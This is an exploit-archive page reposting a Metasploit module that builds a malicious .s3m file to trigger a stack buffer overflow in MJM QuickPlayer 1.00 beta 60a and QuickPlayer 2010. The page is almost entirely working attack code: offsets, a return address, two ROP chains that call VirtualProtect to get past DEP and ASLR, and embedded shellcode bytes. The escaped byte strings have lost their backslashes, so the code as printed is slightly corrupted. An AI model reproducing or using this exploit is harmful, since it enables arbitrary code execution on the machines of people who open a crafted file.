Home / exploits MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack
Posted on 30 April 2011
## # $Id: mjm_quickplayer_s3m.rb 12474 2011-04-30 02:37:14Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in one of these 2 applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. }, 'License' => MSF_LICENSE, 'Author' => [ 'rick2600', #found the vulnerabilities 'corelanc0d3r', #rop exploit + msf module ], 'Version' => '$Revision: 12474 $', 'References' => [ [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-003' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2339, #about 0x900 bytes 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal Generic DEP & ASLR Bypass', { 'OffSet1' => 819, #QuickPlayer 2010.exe 'OffSet2' => 1019, #qplayer.exe 'Ret' => 0x1000156f, #QuickPlayer 2010.exe : RET, qplayer.exe ADD AL,5B + POP + RET 4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 30, 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 's3m file', 'song.s3m']), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") header = "x42x42x42x42x42x42x42x42x41x41x41x41x41x41x41x41" header << "x00x00x00x00x00x00x00x00x00x00x00x00x1ax10x00x00" header << "x24x00x00x01x00x0dx08x00x20x13x02x00x53x43x52x4d" header << "x40x06x94xb0x10xfcx00x00x00x00x00x00x00x00x00x00" header << "x00x08x01x09x02x0ax03x0bx04x0cxffxffxffxffxffxff" header << "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" header << "x06x00x03x01x02x04x05x07x08x09x09x0ax0bx0cx0dx0e" header << "x0fx10x10x11x12x13x14x15x16x16x17x18x19x18x1ax1b" header << "x1bx1cxffxffx13x00x18x00x1dx00x22x00x27x00x2cx00" header << "x31x00x36x00x3bx00x40x00x45x00x4ax00x4fx00x54x00" header << "x59x00x5ex00x63x00x68x00x6dx00x72x00x77x00x7cx00" header << "x81x00x86x00x8bx00x90x00x95x00x9ax00x9fx00xa4x00" header << "xa9x00xaex00xb3x00xb8x00xbdx00xc2x00xc7x00xccx00" header << "xd1x00xd6x00xdbx00xe0x00x14x01x4dx01x87x01xc0x01" header << "x0ex02x5ax02x9ax02xe9x02x40x03x7fx03xc0x03x01x04" header << "x28x04x52x04x86x04xb9x04xeax04x1ax05x41x05x6ex05" header << "x96x05xbcx05xebx05x25x06x78x06xccx06x21x07x72x07" header << "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" header << "x01" footer = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" footer << "x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" footer << "x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" footer << "x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" footer << "x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" footer << "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" footer << "x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" footer << "xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" footer << "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" footer << "x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" footer << "x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" footer << "x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" footer << "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" footer << "x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x00" footer << "x00x00x00x00x00x00x00x00" print_status("Preparing payload") pivot = [target.ret].pack('V') rop_gadgets_quickplayer = [ # pvefindaddr rop 'n roll 0x004c0021, # POP ECX # RETN 0x00000000, 0x0042850e, # PUSH ESP # ADD EDI,EDI # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C junk, junk, junk, 0x00461248, # MOV EAX,EDI # POP EDI # POP ESI # RETN junk, junk, junk, junk, junk, 0x004ac31d, # POP EBX # RETN 0x00000900, 0x004a8032, # POP ESI # RETN 0x00000080, 0x10009ea7, # ADD EAX,ESI # POP ESI # RETN junk, 0x004def0d, # XCHG EAX,EBP # RETN 0x004c0145, # POP EAX # RETN 0x005da1a0, # VirtualProtect 0x00408242, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x0052001a, # XCHG EAX,ESI # RETN 00 0x004c0729, # POP EDX # RETN 0x00000040, 0x004c0021, # POP ECX # RETN 0x00401000, # RW 0x00448142, # POP EDI # RETN 0x004ae7ce, # RET 0x004c0145, # POP EAX # RETN 0x004ae7ce, # RET 0x0052158e, # PUSHAD # RETN 00 ].pack("V*") rop_gadgets_qplayer = [ junk, 0x00434069, # POP ECX # RETN QPlayer.exe junk, 0x00000000, 0x0047e1db, # XOR ECX,ESP # RETN QPlayer.exe 0x10005dad, # MOV EAX,ECX # POP EBX # RETN 08 QPlayer.lay 0x00000900, 0x0043adfd, # POP ESI # RETN 04 QPlayer.exe junk, junk, 0x00000080, 0x1000591a, # ADD EAX,ESI # POP EDI # POP ESI # POP EBP # RETN 0C QPlayer.lay junk, junk, junk, junk, 0x00434e95, # XCHG EAX,EBP # RETN QPlayer.exe junk, junk, junk, 0x10005054, # POP EAX # RETN QPlayer.lay 0x004bfe64, # VirtualProtect 0x10009050, # MOV EAX,DWORD PTR DS:[EAX] # RETN QPlayer.lay 0x004bc675, # XCHG EAX,ESI # RETN QPlayer.exe 0x00417a5d, # POP EDX # RETN QPlayer.exe 0x00000040, 0x0045feaa, # POP ECX # RETN QPlayer.exe 0x00401000, # RW 0x00400ddc, # POP EDI # RETN QPlayer.exe 0x10006067, # RET QPlayer.exe 0x004308f5, # POP EAX # RETN QPlayer.exe 0x10006067, # RET QPlayer.exe 0x004b4676, # PUSHAD # RETN ].pack("V*") buffer = rand_text(target['OffSet1']) buffer << pivot buffer << rop_gadgets_quickplayer delta = target['OffSet2'] - buffer.length - 5 buffer << make_nops(delta) buffer << "xe9x90x00x00x00" buffer << pivot buffer << rop_gadgets_qplayer buffer << make_nops(100) buffer << payload.encoded filecontent = header + buffer + footer print_status("Writing payload to file") file_create(filecontent) end end
